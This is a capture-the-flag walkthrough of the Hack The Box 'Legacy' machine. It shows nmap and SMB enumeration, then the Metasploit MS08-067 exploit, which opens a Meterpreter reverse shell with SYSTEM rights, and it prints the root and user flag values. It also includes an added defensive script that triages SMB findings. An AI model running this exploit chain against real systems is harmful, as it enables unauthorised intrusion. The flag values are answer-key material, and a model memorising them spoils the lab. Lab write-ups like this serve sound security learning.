HTB | Legacy
Walkthrough
Time to Root Machine: ~15min
Write-up Date(s): 1/12/2021
Last Edited: 1/12/2021
Since we have already established a connection to Hack The Box's network, we are going to start our journey with the Legacy machine [IP Address: 10.10.10.4] with a simple Nmap scan:

```
┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 12:21 EDT
Nmap scan report for 10.10.10.4
Host is up (0.088s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (89%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP SP2 or Windows Server 2003 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h25m11s, deviation: 2h07m16s, median: -5h55m11s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:73:d1 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-04-23T16:27:51+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   50.12 ms 10.10.16.1
2   97.48 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.12 seconds
```
Nothing much is happening on the port scan. We have found that the machine has SMB open on ports 139 & 445. Moving a little further down the nmap scan, we also see that there is a 92% chance that the host is running Windows XP SP3, which could lead to something as well.

Even though the nmap scan did not indicate anonymous SMB login, we will go ahead and attempt a quick enumeration, but not dive too deep into the rabbit hole:
```
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/ --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER

┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/IPC$ --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER

┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.4/ADMIN$ --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_INVALID_PARAMETER
```
Just as expected, nothing to go off of when trying to further enumerate the SMB ports.
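Even without share access, the nmap host-script output above already carries the findings a defender would flag on this host: an end-of-life OS, SMB signing disabled, and SMB2 negotiation failing (so the host speaks SMBv1 only). As an added example that is not part of the original write-up, the following Python script parses those nmap lines (a constructed sample trimmed from the scan above) and turns them into a prioritised list of findings; the end-of-life OS list is an illustrative assumption, not an authoritative one.

```python
import re
from typing import List, Tuple

# Constructed sample: the SMB host-script lines from the nmap scan above, trimmed.
NMAP_OUTPUT = """\
445/tcp open  microsoft-ds  Windows XP microsoft-ds
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# Assumption: illustrative list of Windows releases that are out of extended support.
END_OF_LIFE_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")


def triage_smb(nmap_text: str) -> List[Tuple[str, str]]:
    """Return (severity, finding) pairs derived from nmap's SMB host scripts,
    ordered high -> medium -> low, so the first entry is the thing to fix first."""
    findings: List[Tuple[str, str]] = []

    # smb-os-discovery reports the OS string on its own "|   OS: ..." line.
    os_match = re.search(r"^\|\s+OS:\s*(.+)$", nmap_text, re.M)
    if os_match:
        os_name = os_match.group(1).strip()
        if any(os_name.startswith(eol) for eol in END_OF_LIFE_OS):
            findings.append(("high", f"end-of-life OS exposed over SMB: {os_name}"))

    # smb2-time failing to negotiate means no SMB2/3 dialect was offered: SMBv1 only.
    if re.search(r"smb2-time: Protocol negotiation failed \(SMB2\)", nmap_text):
        findings.append(("high", "SMB2 negotiation failed: host speaks SMBv1 only"))

    # Unsigned SMB lets an on-path party tamper with sessions.
    if re.search(r"message_signing:\s*disabled", nmap_text):
        findings.append(("medium", "SMB message signing disabled"))

    # account_used: guest means nmap's scripts got in without credentials.
    if re.search(r"account_used:\s*guest", nmap_text):
        findings.append(("low", "guest SMB session accepted (anonymous enumeration possible)"))

    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f[0]])


if __name__ == "__main__":
    for severity, finding in triage_smb(NMAP_OUTPUT):
        print(f"[{severity.upper():6}] {finding}")
```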
We can, however, try to figure out the SMB version that is being used on this machine, and we may be able to gather some information off of that. Let's go ahead and start up msfconsole and run the SMB Version Scanner:

```
┌──(root💀kali)-[~]
└─# msfconsole
[!] The following modules could not be loaded!
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.

       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: To save all commands executed since start up
to a file, use the makerc command

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.4:445      - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 10.10.10.4:445      - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB)
[*] 10.10.10.4:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Well, we didn't get exactly what we were looking for, since we didn't get a specific SMB version, but we did get a definite answer on what version of Windows the machine is running, and that is Windows XP SP3.

Let's go ahead and do a quick Google search and see if we have any exploits to go off of with Windows XP SP3:
Looks promising! Let's go ahead and read up on the first listing, the Rapid7 link:

I think we have struck gold! Looking at the description, it says that "Windows XP targets seem to handle multiple successful exploitation events..."

Scrolling down on the Rapid7 page for the potential exploit found (MS08-067, the Server Service NetAPI vulnerability), we can see that there is a simple Metasploit module that can be used, so let's fire up msfconsole again and run the exploit:
```
┌──(root💀kali)-[~]
└─# msfconsole
[!] The following modules could not be loaded!
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.

       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.16.159:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.159:4444 -> 10.10.10.4:1028) at 2021-04-23 12:33:51 -0400
```
Excellent! We got a meterpreter shell up and running on 10.10.10.4!

Let's see who we are on the machine and what we can access. If we are Admin, we are all set:
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Wow, that was quick and painless. Looks like we are NT AUTHORITY\SYSTEM, or in other words, the built-in Windows SYSTEM account with full administrative control of the box. No privilege escalation is needed, because MS08-067 is exploited in the Server service, which already runs as SYSTEM.

The last thing to do is grab those flags:
```
meterpreter > shell
Process 1572 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> cd ../../
cd ../../

C:\> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\

16/03/2017  08:30                 0 AUTOEXEC.BAT
16/03/2017  08:30                 0 CONFIG.SYS
16/03/2017  09:07    <DIR>          Documents and Settings
16/03/2017  08:33    <DIR>          Program Files
16/03/2017  08:33    <DIR>          WINDOWS
               2 File(s)              0 bytes
               3 Dir(s)   6.488.244.224 bytes free

C:\> cd Documents and Settings
cd Documents and Settings

C:\Documents and Settings> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:07    <DIR>          Administrator
16/03/2017  08:29    <DIR>          All Users
16/03/2017  08:33    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.488.244.224 bytes free

C:\Documents and Settings> cd Administrator
cd Administrator

C:\Documents and Settings\Administrator> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:18    <DIR>          Desktop
16/03/2017  09:07    <DIR>          Favorites
16/03/2017  09:07    <DIR>          My Documents
16/03/2017  08:20    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.488.133.632 bytes free

C:\Documents and Settings\Administrator> cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18    <DIR>          .
16/03/2017  09:18    <DIR>          ..
16/03/2017  09:18                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.488.072.192 bytes free

C:\Documents and Settings\Administrator\Desktop> type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713

C:\Documents and Settings\Administrator\Desktop> cd ../../
cd ../../

C:\Documents and Settings> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:07    <DIR>          Administrator
16/03/2017  08:29    <DIR>          All Users
16/03/2017  08:33    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.488.068.096 bytes free

C:\Documents and Settings> cd john/Desktop
cd john/Desktop

C:\Documents and Settings\john\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19    <DIR>          .
16/03/2017  09:19    <DIR>          ..
16/03/2017  09:19                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.467.751.936 bytes free

C:\Documents and Settings\john\Desktop> type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
```
ROOT FLAG: 993442d258b0e0ec917cae9e695d5713

USER [John] FLAG: e69af0e4f443de7e36876fda4ec7644f